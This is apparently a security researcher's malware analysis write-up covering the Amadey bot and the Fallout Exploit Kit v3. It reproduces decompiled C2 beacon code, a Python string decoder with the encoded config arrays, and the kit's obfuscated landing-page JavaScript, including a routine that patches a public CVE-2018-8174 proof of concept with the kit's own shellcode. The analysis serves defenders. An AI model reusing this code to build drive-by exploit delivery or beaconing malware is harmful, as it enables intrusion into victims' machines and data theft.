Analyzing Amadey

Initial Access

Amadey is installed by msiexec.exe when the victim opens a malicious Excel file. Based on the document-file technique, the threat actor is believed to be TA505.

The msiexec command line is as follows (the package URL passed to /i, i.e. the download URL, has been omitted from this write-up):

msiexec.exe STOP=1 /i /q ksw='%TEMP%'

First payload

The first payload is packed. The original PE can be extracted with the hollows_hunter mode of tknk_scanner.


The dumped PE is compiled with MinGW.

PE: compiler: MinGW(-)[-]
PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32]

It still contains symbol information (mangled C++ names), so the functions of Amadey can be listed by name:


The main function is as follows.

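/*
 * Ghidra decompilation of Amadey's entry point (symbol "main" at 0x3ac8).
 * The braces, which were lost when the listing was extracted, are restored.
 * main only resolves the binary's own path and an install destination; both
 * results are assigned to pcVar1 and then discarded, which is a decompiler
 * artifact of calls whose return value is unused. The interesting logic
 * (C2 beaconing) lives in the callees, e.g. _Z6aBasici shown below.
 */
int __cdecl main(int _Argc,char **_Argv,char **_Env)
{
  char *pcVar1;
                    /* 0x3ac8  97  main */
  pcVar1 = _Z12aGetSelfPathv();          /* aGetSelfPath(): path of the running executable (name-based reading) */
  pcVar1 = _Z19aGetSelfDestinationi(0);  /* aGetSelfDestination(0): drop/install location; meaning of 0 not visible here */
  return 0;
}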

The _Z6aBasici function (demangled: aBasic(int)) is as follows.

/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

/*
 * Ghidra decompilation of _Z6aBasici (aBasic(int)) at 0x33fe.
 * It decrypts the embedded C2 configuration strings (aDomain, aScript,
 * aParam0..aParam8, aVers) with _Z8aDecryptPc and interleaves them with
 * host facts gathered at run time. Decoding aParamN with the script below
 * gives the separators "id=", "&vs=", "&ar=", "&bi=", "&lv=", "&os=",
 * "&av=", "&pc=", "&un=", so this is evidently the key=value body of the
 * HTTP POST sent in the loop at the end. The repeated overwrites of
 * _Source suggest the decompiler did not recover the string-concatenation
 * code between the calls. The listing is truncated after `param_1 == 1`
 * and the closing braces were lost in extraction; it is reproduced as is.
 */
void __cdecl _Z6aBasici(int param_1)

  char *_Source;
  uint uVar1;
  int iVar2;
                    /* 0x33fe  32  _Z6aBasici */
  _Source = _Z8aDecryptPc(&aDomain);       /* C2 domain */
  _Source = _Z8aDecryptPc(&aScript);       /* request path on the C2 */
  _Source = _Z8aDecryptPc(&aParam0);       /* "id=" */
  _Source = _Z6aGetIdv();                  /* victim/bot identifier (name-based reading) */
  _Source = _Z8aDecryptPc(&aParam1);       /* "&vs=" */
  _Source = _Z8aDecryptPc(&aVers);         /* malware version string */
  uVar1 = _Z11aCheckAdminv();              /* admin check; only the low byte is tested */
  if ((uVar1 & 0xff) == 1) {
    _Source = _Z8aDecryptPc(&aParam2);     /* "&ar=" — same string in both branches; the value appended differs in code not shown here */
  else {
    _Source = _Z8aDecryptPc(&aParam2);
  _Source = _Z8aDecryptPc(&aParam3);       /* "&bi=" */
  _Source = _Z10aGetOsArchv();             /* OS architecture */
  _Source = _Z8aDecryptPc(&aParam4);       /* "&lv=" */
  _Source = _Z10aIntToChari(param_1);      /* the caller's argument, reported as a number */
  _Source = _Z8aDecryptPc(&aParam5);       /* "&os=" */
  iVar2 = _Z6aGetOsv();
  _Source = _Z10aIntToChari(iVar2);        /* OS version code */
  _Source = _Z8aDecryptPc(&aParam6);       /* "&av=" */
  uVar1 = _Z8aCheckAVv();
  _Source = _Z10aIntToChari(uVar1);        /* installed-AV code (see the AV00..AV11 strings below) */
  _Source = _Z8aDecryptPc(&aParam7);       /* "&pc=" */
  _Source = _Z12aGetHostNamev();
  _Source = _Z8aDecryptPc(&aParam8);       /* "&un=" */
  _Source = _Z12aGetUserNamev();
  if (param_1 == 0) {
    do {
      /* Beacon loop: POST via Winsock with the three stack buffers; no exit condition is visible in this listing. */
      _Source = _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4);
    } while( true );
  if (param_1 == 1) {                      /* listing truncated here */

Some important strings are encoded, but the encoding algorithm is very simple: each plaintext byte has the corresponding byte of a repeating key added to it, so decoding is a byte-wise subtraction.

The key is the following ASCII string, applied byte by byte and repeated as needed: 8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7

Finally, we decode each string and note the name of the function in which it is used.

Here is a simple Python decoding script (the original one-liner loop decoded a single array; this version wraps the algorithm in a function and decodes every captured array).

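"""Decoder for Amadey's encoded configuration strings.

Encoding: plaintext byte i is stored as (byte + key[i % len(key)]) where the key is
the ASCII string below, so decoding subtracts the key byte again. The published
script was an unfinished loop over one array (the counter/key setup, the ``while``
and the ``break`` were missing and it raised ValueError on a negative difference);
this version is a complete, reusable decoder that handles all captured arrays.
"""

KEY = "8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"

# Encoded byte arrays as found in the sample, keyed by the name of the global /
# the function that uses them.
ENCODED = {
    "domain": [0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D],
    "AutoRunCmdr": [0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85],
    "AV00": [0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9],
    "AV01": [0x79, 0xDB, 0xCB, 0xD6, 0x94],
    "AV02": [0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92],
    "AV03": [0x7D, 0xB8, 0xA7, 0xB8],
    "AV04": [0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD],
    "AV05": [0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B],
    "AV06": [0x79, 0xBB, 0xA9],
    "AV07": [0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2],
    "AV08": [0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5],
    "AV09": [0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7],
    "AV10": [0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC],
    "AV11": [0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8],
    "CMD0": [0x74, 0xC8, 0xA0],
    "CMD1": [0x74, 0xC9, 0xA0],
    "DLL": [0x9C, 0xD1, 0xCE],
    "DropDir": [0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D],
    "DropName": [0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98],
    "exe": [0x9D, 0xDD, 0xC7],
    "GetProgDir": [0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE],
    "OS_AR0": [0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE],
    "OS_AR1": [0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F],
    "Param0": [0xA1, 0xC9, 0x9F],
    "Param1": [0x5E, 0xDB, 0xD5, 0xA1],
    "Param2": [0x5E, 0xC6, 0xD4, 0xA1],
    "Param3": [0x5E, 0xC7, 0xCB, 0xA1],
    "Param4": [0x5E, 0xD1, 0xD8, 0xA1],
    "Param5": [0x5E, 0xD4, 0xD5, 0xA1],
    "Param6": [0x5E, 0xC6, 0xD8, 0xA1],
    "Param7": [0x5E, 0xD5, 0xC5, 0xA1],
    "Param8": [0x5E, 0xDA, 0xD0, 0xA1],
    "Post0": [0x45, 0x6F],
    "Post1": [0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67],
    "Post2": [0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D],
    "Post3": [0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C],
    "Post4": [0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59],
    "Post5": [0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59],
    "Post6": [0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68],
    "RunAs": [0xAA, 0xDA, 0xD0, 0xC5, 0xA6],
    "RunDll_0": [0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50],
    "Script": [0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0],
    "Shell": [0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F],
    # TimeOut looks like a little-endian DWORD (0x0000EA60 = 60000) followed by one
    # byte, not text; the original script raised ValueError on it.
    "TimeOut": [0x60, 0xEA, 0x00, 0x00, 0x44],
    "URLMon_0": [0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7],
    "URLMon_1": [0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77],
    "Vers": [0x69, 0x93, 0x94, 0x96],
    "ZoneIdent": [0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB],
}


def decode(encoded, key=KEY):
    """Decode one Amadey string.

    Args:
        encoded: sequence of ints (0-255) exactly as stored in the binary.
        key: repeating ASCII key; defaults to the key recovered from the sample.

    Returns:
        The decoded text. Output byte i is (encoded[i] - ord(key[i % len(key)]))
        masked to 8 bits, i.e. unsigned byte arithmetic, so a non-text blob such
        as TimeOut decodes to garbage instead of raising.

    Raises:
        ValueError: if ``key`` is empty (the modulo would divide by zero).
    """
    if not key:
        raise ValueError("key must be non-empty")
    key_len = len(key)
    return "".join(
        chr((byte - ord(key[index % key_len])) & 0xFF)
        for index, byte in enumerate(encoded)
    )


if __name__ == "__main__":
    for name, data in ENCODED.items():
        print(f"{name}: {decode(data)!r}")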


Analysis of Fallout Exploit Kit v3


We already tweeted about it, but the Fallout Exploit Kit has been updated. In the new Fallout the traffic chain, the obfuscation of the landing page and the shellcode have all changed. We describe the changes below using a captured saz file.

New #FalloutEK is using PoC on GitHub!
(CC: @kafeine, @jeromesegura, @malware_traffic)

— nao_sec (@nao_sec) February 28, 2019


As usual, the HookAds campaign leads to the Fallout landing page, where the attack starts. The traffic flow looks like this:

Landing Page

Let's read the JavaScript on the landing page. First, an object holding the helpers needed for decoding — a hand-rolled Base64 codec and UTF-8 conversion — is defined.

// Helper object defined by the landing page: a hand-rolled Base64 codec
// (fZ2S0q is the standard Base64 alphabet with '=' at index 64) plus
// UTF-8 encode/decode. The closing braces of the methods were lost when
// the listing was extracted; the code is reproduced as published.
var OygitP9 = {
    fZ2S0q: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    // Base64 encode: UTF-8-encodes the input via P1mnrrMi834, then packs every
    // 3 bytes into 4 alphabet characters; isNaN on a missing byte selects
    // index 64 ('=') for padding.
    cMa5g: function (MQVCd) {
        var b8j5WMF, negriNm4A3, ir4N7w, W3cN0hF2WFu, qT8fpZ1, m3Z1Kc, T82SkC, OcKyWsdOFyq = "",
            p2Z2Fkoy = 0;
        for (MQVCd = OygitP9.P1mnrrMi834(MQVCd); p2Z2Fkoy < MQVCd['length'];) W3cN0hF2WFu = (b8j5WMF = MQVCd['charCodeAt'](p2Z2Fkoy++)) >> 2, qT8fpZ1 = (3 & b8j5WMF) << 4 | (negriNm4A3 = MQVCd['charCodeAt'](p2Z2Fkoy++)) >> 4, m3Z1Kc = (15 & negriNm4A3) << 2 | (ir4N7w = MQVCd['charCodeAt'](p2Z2Fkoy++)) >> 6, T82SkC = 63 & ir4N7w, isNaN(negriNm4A3) ? m3Z1Kc = T82SkC = 64 : isNaN(ir4N7w) && (T82SkC = 64), OcKyWsdOFyq = OcKyWsdOFyq + this['fZ2S0q']['charAt'](W3cN0hF2WFu) + this['fZ2S0q']['charAt'](qT8fpZ1) + this['fZ2S0q']['charAt'](m3Z1Kc) + this['fZ2S0q']['charAt'](T82SkC);
        return OcKyWsdOFyq
    // Base64 decode: strips characters outside the alphabet, unpacks 4
    // characters into 3 bytes (index 64 = padding, that byte is skipped),
    // then UTF-8-decodes the result via quSjT4yyl.
    jbRyz: function (MQVCd) {
        var b8j5WMF, negriNm4A3, ir4N7w, W3cN0hF2WFu, qT8fpZ1, m3Z1Kc, T82SkC = "",
            OcKyWsdOFyq = 0;
        for (MQVCd = MQVCd['replace'](/[^A-Za-z0-9\+\/\=]/g, ""); OcKyWsdOFyq < MQVCd['length'];) b8j5WMF = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++)) << 2 | (W3cN0hF2WFu = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++))) >> 4, negriNm4A3 = (15 & W3cN0hF2WFu) << 4 | (qT8fpZ1 = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++))) >> 2, ir4N7w = (3 & qT8fpZ1) << 6 | (m3Z1Kc = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++))), T82SkC += window['String']['fromCharCode'](b8j5WMF), 64 != qT8fpZ1 && (T82SkC += window['String']['fromCharCode'](negriNm4A3)), 64 != m3Z1Kc && (T82SkC += window['String']['fromCharCode'](ir4N7w));
        return T82SkC = OygitP9.quSjT4yyl(T82SkC)
    // UTF-8 encoder (CRLF normalised to LF first): 1 byte below 0x80, 2 bytes
    // below 0x800 (0xC0 / 0x80 prefixes), 3 bytes otherwise (0xE0 prefix).
    P1mnrrMi834: function (MQVCd) {
        MQVCd = MQVCd['replace'](/\r\n/g, "\n");
        for (var b8j5WMF = "", negriNm4A3 = 0; negriNm4A3 < MQVCd['length']; negriNm4A3++) {
            var ir4N7w = MQVCd['charCodeAt'](negriNm4A3);
            ir4N7w < 128 ? b8j5WMF += window['String']['fromCharCode'](ir4N7w) : (127 < ir4N7w && ir4N7w < 2048 ? b8j5WMF += window['String']['fromCharCode'](ir4N7w >> 6 | 192) : (b8j5WMF += window['String']['fromCharCode'](ir4N7w >> 12 | 224), b8j5WMF += window['String']['fromCharCode'](ir4N7w >> 6 & 63 | 128)), b8j5WMF += window['String']['fromCharCode'](63 & ir4N7w | 128))
        return b8j5WMF
    // UTF-8 decoder, the inverse of P1mnrrMi834. UK1Az5, zxh4w4 and c3 are
    // assigned without a declaration and leak as globals; harmless here.
    quSjT4yyl: function (MQVCd) {
        for (var b8j5WMF = "", negriNm4A3 = 0, ir4N7w = UK1Az5 = zxh4w4 = 0; negriNm4A3 < MQVCd['length'];)(ir4N7w = MQVCd['charCodeAt'](negriNm4A3)) < 128 ? (b8j5WMF += window['String']['fromCharCode'](ir4N7w), negriNm4A3++) : 191 < ir4N7w && ir4N7w < 224 ? (zxh4w4 = MQVCd['charCodeAt'](negriNm4A3 + 1), b8j5WMF += window['String']['fromCharCode']((31 & ir4N7w) << 6 | 63 & zxh4w4), negriNm4A3 += 2) : (zxh4w4 = MQVCd['charCodeAt'](negriNm4A3 + 1), c3 = MQVCd['charCodeAt'](negriNm4A3 + 2), b8j5WMF += window['String']['fromCharCode']((15 & ir4N7w) << 12 | (63 & zxh4w4) << 6 | 63 & c3), negriNm4A3 += 3);
        return b8j5WMF

The next definition is also for decoding: a String prototype method that XORs the string with a repeating key, the key being read from a global variable whose name is passed as the argument.

// String.prototype.kWNcdNj7d6U(name): XOR every character of `this` with the
// characters of window[name] (the key is a global looked up by name, e.g.
// window['RLGuTgUF3d0'] in the calls below), cycling through the key. XOR is
// its own inverse, so the same method both encodes and decodes.
window['String']['prototype']['kWNcdNj7d6U'] = function (DwQ5oeN9ct) {
    var hxk4VZ3L8GC = window[DwQ5oeN9ct];   // key string
    var UsEJ64xf0P = '';
    // D8H6A7MGHf walks the input, r5UpGh walks the key and wraps to 0 at its end
    for (var D8H6A7MGHf = 0, r5UpGh = 0; D8H6A7MGHf < this['length']; D8H6A7MGHf++, r5UpGh++) {
        if (r5UpGh === hxk4VZ3L8GC['length']) {
            r5UpGh = 0;
        UsEJ64xf0P += window['String']['fromCharCode'](this['charCodeAt'](D8H6A7MGHf) ^ hxk4VZ3L8GC['charCodeAt'](r5UpGh));
    return UsEJ64xf0P;

The next method fingerprints the browser: it checks for Opera (window.opr.addons, window.opera, or ' OPR/' in the User-Agent), for window.InstallTrigger, for document.documentMode and for window.chrome.runtime, joins the four booleans with the string it was called on, then XOR-encodes the result with the key in window['RLGuTgUF3d0'] and Base64-encodes it. The server can use this to avoid serving the exploit to browsers such as Chrome and Opera.

// String.prototype.i2668FMs5B8(): browser fingerprint used as the POST body.
// Concatenates four booleans — Opera (opr.addons / window.opera / ' OPR/' in the
// UA), InstallTrigger present, document.documentMode present, chrome.runtime
// present — separated by `this` (the caller uses '@@'), then XORs the text with
// the key in window['RLGuTgUF3d0'] and Base64-encodes it with OygitP9.cMa5g.
window['String']['prototype']['i2668FMs5B8'] = function () {
    var BITU978SF7 = ((!!window['opr'] && !!window['opr']['addons']) || !!window['opera'] || navigator['userAgent']['indexOf'](' OPR/') >= 0) + this + (typeof window['InstallTrigger'] !== 'undefined') + this + (false || !!window['document']['documentMode']) + this + (!!window['chrome'] && !!window['chrome']['runtime']);
    return window['OygitP9']['cMa5g'](BITU978SF7['kWNcdNj7d6U']('RLGuTgUF3d0'));

The next method is the one that executes code, and is the most important one; only its signature is shown here.

window['String']['prototype']['eCWmvY'] = function () {

With these helpers in place, the following code runs. It POSTs the browser fingerprint to a URL that is itself Base64+XOR encoded, then Base64-decodes and XOR-decodes the response and executes it.

// XHR callback: on HTTP 200, Base64-decode the response (OygitP9.jbRyz) and
// XOR it with the key in window['RLGuTgUF3d0']. What is done with riqAvm0Is
// is cut from this listing — presumably it is passed to eCWmvY for execution.
window['VS4H8Yo1']['onreadystatechange'] = function () {
    if (4 == this['readyState'] && 200 == this['status']) {
        var W7iaUaId = window['VS4H8Yo1']['responseText'];
        var riqAvm0Is = window['OygitP9']['jbRyz'](W7iaUaId)['kWNcdNj7d6U']('RLGuTgUF3d0');

// The request URL (mbwk99) is stored Base64+XOR encoded with the same key;
// the POST body is the browser fingerprint with '@@' as the field separator.
window['VS4H8Yo1']['open']('post', window['OygitP9']['jbRyz'](mbwk99)['kWNcdNj7d6U']('RLGuTgUF3d0'), true);
window['VS4H8Yo1']['send']('@@' ['i2668FMs5B8']());

Encoded data

Decoding the downloaded data yields the following code.

// Decoded second stage. ZV7S8RUn holds Fallout's own shellcode (elided here).
var ZV7S8RUn = '-- Shellcode here --';
// XDomainRequest is an Internet Explorer-specific API. The request fetches a
// public CVE-2018-8174 proof-of-concept page (its URL is redacted below).
var dIl15w = new window['XDomainRequest']();
dIl15w['onload'] = function() {
    var H2Kqgnp = dIl15w['responseText'];
    // Keep only the VBScript part of the fetched PoC page.
    var WW7QZmX = H2Kqgnp['substring'](H2Kqgnp['indexOf']('<script language="vbscript">'),H2Kqgnp['indexOf']('</body>'));
    var l1a2N5kr = WW7QZmX['split']('\n');
    for(var L8c4YdRG = 0; L8c4YdRG < l1a2N5kr['length']; L8c4YdRG++) {
        // Four shellcode markers from known PoCs (two %u-encoded shellcode prefixes
        // and two literal placeholders). Whichever one appears on the line is
        // located and the quoted string from it up to the closing '"' is
        // replaced with ZV7S8RUn.
        if(l1a2N5kr[L8c4YdRG]['indexOf']('%ue8fc%u008') != -1 || l1a2N5kr[L8c4YdRG]['indexOf']('#{encoded_payload}') != -1 || l1a2N5kr[L8c4YdRG]['indexOf']('%u8b55%u81ec') != -1 || l1a2N5kr[L8c4YdRG]['indexOf']('REPLACE_SHELLCODE_HERE') != -1) {
            var g68j2okJh5D = '';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('%ue8fc%u008') != -1) {
                g68j2okJh5D = '%ue8fc%u008';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('#{encoded_payload}') != -1) {
                g68j2okJh5D = '#{encoded_payload}';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('%u8b55%u81ec') != -1) {
                g68j2okJh5D = '%u8b55%u81ec';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('REPLACE_SHELLCODE_HERE') != -1) {
                g68j2okJh5D = 'REPLACE_SHELLCODE_HERE';
            var zEZGDPaGVEt = l1a2N5kr[L8c4YdRG]['substring'](l1a2N5kr[L8c4YdRG]['indexOf'](g68j2okJh5D),l1a2N5kr[L8c4YdRG]['indexOf']('"',l1a2N5kr[L8c4YdRG]['indexOf'](g68j2okJh5D)));
            l1a2N5kr[L8c4YdRG] = l1a2N5kr[L8c4YdRG]['replace'](zEZGDPaGVEt,ZV7S8RUn);
        // Strip VBScript comments: everything from the first single quote on.
        // (This also truncates any line that has a ' inside a string literal.)
        if(l1a2N5kr[L8c4YdRG]['indexOf']('\'') != -1) {
            var TJIp1rglYoq = l1a2N5kr[L8c4YdRG]['substring'](l1a2N5kr[L8c4YdRG]['indexOf']('\''));
            l1a2N5kr[L8c4YdRG] = l1a2N5kr[L8c4YdRG]['replace'](TJIp1rglYoq,'');
        // Remove the PoC's debugging output so the victim sees nothing.
        if(l1a2N5kr[L8c4YdRG]['indexOf']('MsgBox') != -1) {
            l1a2N5kr[L8c4YdRG] = '';
        if(l1a2N5kr[L8c4YdRG]['indexOf']('Alert') != -1) {
            l1a2N5kr[L8c4YdRG] = '';
    WW7QZmX = l1a2N5kr['join']('\n');
    // The patched VBScript is loaded in an iframe; the document write call is
    // not part of this listing.
    var nbvMHPdb = window['document']['createElement']("iframe");
    nbvMHPdb['setAttribute']("id", "AARa7");
    var ocH5HC2B = window['document']['getElementById']("AARa7")['contentWindow']['document'];
// GET URL redacted; the send() call is not shown.
dIl15w['open']('get', '');

This code builds its exploit by fetching a public CVE-2018-8174 proof of concept from GitHub at run time and replacing the PoC's shellcode with Fallout's own. The four marker strings above correspond to the four PoCs we have seen abused this way; there may be others.


In the previous post we wrote that Fallout uses RC4 and PowerShell. It now decrypts with RC4 using multiple keys.

Encrypted data

The encrypted data is located near the end of the shellcode.

The following strings are encrypted.


API hash

The shellcode resolves the APIs it calls by hash; the hashes match the dualaccModFFF1Hash algorithm, as identified by ShellcodeHashSearcher below (the list appears twice, at offsets one byte apart, i.e. two matches of the same hash table).

ShellcodeHashSearcher: 0x00000686: dualaccModFFF1Hash:0x191c0443 kernel32.dll!CloseHandle
ShellcodeHashSearcher: 0x00000694: dualaccModFFF1Hash:0x28b90575 kernel32.dll!CreateProcessA
ShellcodeHashSearcher: 0x000006a6: dualaccModFFF1Hash:0x73320951 kernel32.dll!CreateToolhelp32Snapshot
ShellcodeHashSearcher: 0x000006b9: dualaccModFFF1Hash:0x33f50614 kernel32.dll!GetModuleHandleA
ShellcodeHashSearcher: 0x000006ca: dualaccModFFF1Hash:0x1d810497 kernel32.dll!LoadLibraryA
ShellcodeHashSearcher: 0x000006da: dualaccModFFF1Hash:0x2785054d kernel32.dll!Process32First
ShellcodeHashSearcher: 0x000006eb: dualaccModFFF1Hash:0x225904e4 kernel32.dll!Process32Next
ShellcodeHashSearcher: 0x000006fc: dualaccModFFF1Hash:0x1f7004d3 kernel32.dll!VirtualAlloc
ShellcodeHashSearcher: 0x0000070d: dualaccModFFF1Hash:0x1a1e047a kernel32.dll!ExitProcess
ShellcodeHashSearcher: 0x0000071e: dualaccModFFF1Hash:0x158503f3 kernel32.dll!ExitThread
ShellcodeHashSearcher: 0x00000737: dualaccModFFF1Hash:0x08d8028c msvcrt.dll!memset
ShellcodeHashSearcher: 0x00000737: dualaccModFFF1Hash:0x08d8028c ntoskrnl.exe!memset
ShellcodeHashSearcher: 0x00000737: dualaccModFFF1Hash:0x08d8028c ntdll.dll!memset
ShellcodeHashSearcher: 0x00000778: dualaccModFFF1Hash:0x3610065d wininet.dll!HttpOpenRequestA
ShellcodeHashSearcher: 0x00000787: dualaccModFFF1Hash:0x29fb0584 wininet.dll!HttpQueryInfoA
ShellcodeHashSearcher: 0x0000079a: dualaccModFFF1Hash:0x35c70655 wininet.dll!HttpSendRequestA
ShellcodeHashSearcher: 0x000007ab: dualaccModFFF1Hash:0x4b92078c wininet.dll!InternetCloseHandle
ShellcodeHashSearcher: 0x000007bc: dualaccModFFF1Hash:0x36640655 wininet.dll!InternetConnectA
ShellcodeHashSearcher: 0x000007cd: dualaccModFFF1Hash:0x245c051d wininet.dll!InternetOpenA
ShellcodeHashSearcher: 0x000007de: dualaccModFFF1Hash:0x35c00646 wininet.dll!InternetReadFile
ShellcodeHashSearcher: 0x00000685: dualaccModFFF1Hash:0x191c0443 kernel32.dll!CloseHandle
ShellcodeHashSearcher: 0x00000693: dualaccModFFF1Hash:0x28b90575 kernel32.dll!CreateProcessA
ShellcodeHashSearcher: 0x000006a5: dualaccModFFF1Hash:0x73320951 kernel32.dll!CreateToolhelp32Snapshot
ShellcodeHashSearcher: 0x000006b8: dualaccModFFF1Hash:0x33f50614 kernel32.dll!GetModuleHandleA
ShellcodeHashSearcher: 0x000006c9: dualaccModFFF1Hash:0x1d810497 kernel32.dll!LoadLibraryA
ShellcodeHashSearcher: 0x000006d9: dualaccModFFF1Hash:0x2785054d kernel32.dll!Process32First
ShellcodeHashSearcher: 0x000006ea: dualaccModFFF1Hash:0x225904e4 kernel32.dll!Process32Next
ShellcodeHashSearcher: 0x000006fb: dualaccModFFF1Hash:0x1f7004d3 kernel32.dll!VirtualAlloc
ShellcodeHashSearcher: 0x0000070c: dualaccModFFF1Hash:0x1a1e047a kernel32.dll!ExitProcess
ShellcodeHashSearcher: 0x0000071d: dualaccModFFF1Hash:0x158503f3 kernel32.dll!ExitThread
ShellcodeHashSearcher: 0x00000736: dualaccModFFF1Hash:0x08d8028c msvcrt.dll!memset
ShellcodeHashSearcher: 0x00000736: dualaccModFFF1Hash:0x08d8028c ntoskrnl.exe!memset
ShellcodeHashSearcher: 0x00000736: dualaccModFFF1Hash:0x08d8028c ntdll.dll!memset
ShellcodeHashSearcher: 0x00000777: dualaccModFFF1Hash:0x3610065d wininet.dll!HttpOpenRequestA
ShellcodeHashSearcher: 0x00000786: dualaccModFFF1Hash:0x29fb0584 wininet.dll!HttpQueryInfoA
ShellcodeHashSearcher: 0x00000799: dualaccModFFF1Hash:0x35c70655 wininet.dll!HttpSendRequestA
ShellcodeHashSearcher: 0x000007aa: dualaccModFFF1Hash:0x4b92078c wininet.dll!InternetCloseHandle
ShellcodeHashSearcher: 0x000007bb: dualaccModFFF1Hash:0x36640655 wininet.dll!InternetConnectA
ShellcodeHashSearcher: 0x000007cc: dualaccModFFF1Hash:0x245c051d wininet.dll!InternetOpenA
ShellcodeHashSearcher: 0x000007dd: dualaccModFFF1Hash:0x35c00646 wininet.dll!InternetReadFile

The final encoded PowerShell script is downloaded, decoded and executed.


# Final PowerShell stage, reproduced with its original l/I/1 identifiers and
# annotated only. It compiles a small P/Invoke shim with Add-Type, downloads
# the payload to a randomly named .tmp file under %USERPROFILE%\AppData\LocalLow,
# and starts it with CreateProcess.
#   lI111    - fields (IntPtr, IntPtr, uint, uint) match PROCESS_INFORMATION
